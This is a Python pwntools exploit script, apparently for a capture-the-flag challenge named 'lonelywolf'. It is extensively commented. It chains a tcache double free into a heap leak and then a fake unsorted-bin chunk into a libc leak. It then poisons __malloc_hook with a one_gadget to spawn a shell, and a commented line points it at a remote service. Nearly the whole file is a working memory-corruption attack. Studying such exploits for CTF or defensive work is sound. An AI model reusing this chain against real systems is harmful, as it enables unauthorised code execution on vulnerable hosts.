# lonelywolf -- heap exploit for ./pwn with the shipped libc-2.27.so
from pwn import *
# Target setup. The local binary is used by default; swap in the commented
# remote() line to run against the live service. The libc must be the one
# shipped with the challenge: every offset further down is hard-coded for it.
context.update(arch='amd64', log_level='debug')
p = process('./pwn')
libc = ELF('./libc-2.27.so')
#p=remote('124.71.235.219',25196)
def add(idx, size):
    """Menu option 1: answer the Index/Size prompts with `idx` and `size`.

    Blocks until each prompt string is seen (no timeout), so a mismatch in
    the menu text hangs the script rather than failing.
    """
    p.sendlineafter('Your choice: ', '1')
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Size: ', str(size))
def edit(idx, content):
    """Menu option 2: write `content` (str or bytes) into slot `idx`.

    The payload goes out via sendline, so a trailing newline is appended to
    whatever the program reads -- callers rely on that extra byte in places.
    """
    p.sendlineafter('Your choice: ', '2')
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Content: ', content)
def show(idx):
    """Menu option 3: ask the program to print slot `idx`.

    Does not consume the output; the caller reads past 'Content: ' itself.
    """
    p.sendlineafter('Your choice: ', '3')
    p.sendlineafter('Index: ', str(idx))
def free(idx):
    """Menu option 4: free slot `idx`.

    The exploit below calls this twice on the same slot without an
    allocation in between, i.e. the program does not clear the pointer.
    """
    p.sendlineafter('Your choice: ', '4')
    p.sendlineafter('Index: ', str(idx))
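# All constants below (0x260, 0x280, 0x451, 0x3ebca0, 0x10a41c) are tied to
# this binary's heap layout and to libc-2.27.so; re-derive them under gdb /
# one_gadget if either changes.

# ---- Stage 1: heap leak through a tcache double free ----------------------
# free(0) is issued twice on the same slot with only an edit() in between.
# The edit presumably defeats the tcache double-free check: the 8 bytes cover
# the `next` field and the '\n' appended by sendline lands on the low byte of
# the `key` field -- confirm against the binary's read size if free() aborts.
add(0, 0x78)
for _ in range(2):
    edit(0, 'aaaaaaaa')
    free(0)
# After the double free the chunk's `next` points at itself, so show() leaks
# a heap pointer. Heap pointers have 6 significant bytes; pad to 8 before
# unpacking. 0x260 is this chunk's distance from the heap start (the
# tcache_perthread_struct and earlier chunks sit before it).
show(0)
p.recvuntil('Content: ')
heap_base = u64(p.recv(6).ljust(8, b'\x00')) - 0x260
log.success('heap_base :' + hex(heap_base))

# ---- Stage 2: fake 0x450 chunk -> unsorted bin -> libc leak ---------------
# Place a fake size header 0x451 at user+0x18, i.e. the size field of a chunk
# whose user data starts at heap_base+0x280. 0x450 is above the tcache limit,
# so freeing that chunk later goes to the unsorted bin and leaves a
# main_arena pointer in its fd.
payload = p64(0) * 3 + p64(0x451)
add(0, 0x78)
edit(0, payload)
# NOTE(review): indentation was lost in the source; only add() belongs in
# this loop. Ten 0x70 chunks pad the heap so the memory right after the fake
# 0x450 chunk holds a sane next-chunk size when it is freed (glibc checks
# it). The free() afterwards is the first free of the last padding chunk.
for _ in range(10):
    add(0, 0x68)
free(0)
# Same double-free trick as stage 1, then poison the freed chunk's `next`
# so the second add() hands back the fake chunk at heap_base+0x280.
edit(0, b'p' * 8)
free(0)
edit(0, p64(heap_base + 0x280) + p64(0))
add(0, 0x68)
add(0, 0x68)
free(0)                      # fake 0x450 chunk -> unsorted bin
show(0)
p.recvuntil('Content: ')
# The unsorted-bin fd points at main_arena+96; on this libc main_arena lies
# 0x10 past __malloc_hook, so the arithmetic equals a fixed 0x3ebca0 offset.
# Read up to the 0x7f high byte of the pointer, then pad to 8 bytes.
libc_base = u64(p.recvuntil(b'\x7f').ljust(8, b'\x00')) - 96 - 0x10 - libc.symbols['__malloc_hook']  # 0x3ebca0
log.success('libc_base:' + hex(libc_base))
malloc_hook = libc_base + libc.symbols['__malloc_hook']

# ---- Stage 3: tcache-poison __malloc_hook with a one_gadget ---------------
add(0, 0x70)
free(0)
edit(0, b'p' * 8)            # clobber tcache bookkeeping again
free(0)                      # double free
edit(0, p64(malloc_hook))    # next -> __malloc_hook
add(0, 0x70)
add(0, 0x70)                 # this allocation lands on __malloc_hook
# 0x10a41c is presumably a one_gadget offset for libc-2.27.so; its register
# constraints must hold at the malloc() below -- verify with one_gadget.
edit(0, p64(0x10a41c + libc_base))
#gdb.attach(p)
add(0, 0x10)                 # malloc() -> __malloc_hook -> shell
p.interactive()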